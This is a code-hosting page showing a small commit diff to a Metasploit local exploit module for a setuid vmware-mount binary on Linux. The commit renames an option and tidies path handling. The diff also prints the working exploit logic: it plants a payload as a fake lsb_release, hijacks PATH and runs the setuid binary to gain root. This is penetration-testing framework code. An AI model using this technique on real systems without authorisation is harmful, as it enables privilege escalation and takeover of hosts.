infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Suggestions from OJ

bug/bundler_fix
Rasta Mouse 2014-11-27 21:38:50 +00:00
parent 25ecf73d7d
commit 985838e999
1 changed files with 7 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
modules/exploits/linux/local/vmware_mount.rb
View File

@ -54,7 +54,7 @@ class Metasploit4 < Msf::Exploit::Local
}
))
register_options([
OptString.new("WritableDir", [ true, "A directory where you can write files.", "/tmp" ]),
OptString.new("WRITABLEDIR", [ true, "A directory where you can write files.", "/tmp" ]),
], self.class)
end
@ -71,13 +71,14 @@ class Metasploit4 < Msf::Exploit::Local
fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
end
path = "#{datastore["WritableDir"]}"
write_file("#{path}/lsb_release", generate_payload_exe)
cmd_exec("chmod +x #{path}/lsb_release")
cmd_exec("PATH=#{path}:$PATH /usr/bin/vmware-mount")
lsb_path = File.join(datastore['WRITABLEDIR'], 'lsb_release')
write_file(lsb_path, generate_payload_exe)
cmd_exec("chmod +x #{lsb_path}")
cmd_exec("PATH=#{datastore['WRITABLEDIR']}:$PATH /usr/bin/vmware-mount")
# Delete it here instead of using FileDropper because the original
# session can clean it up
cmd_exec("rm -f #{path}/lsb_release")
cmd_exec("rm -f #{lsb_path}")
end
def setuid?(remote_file)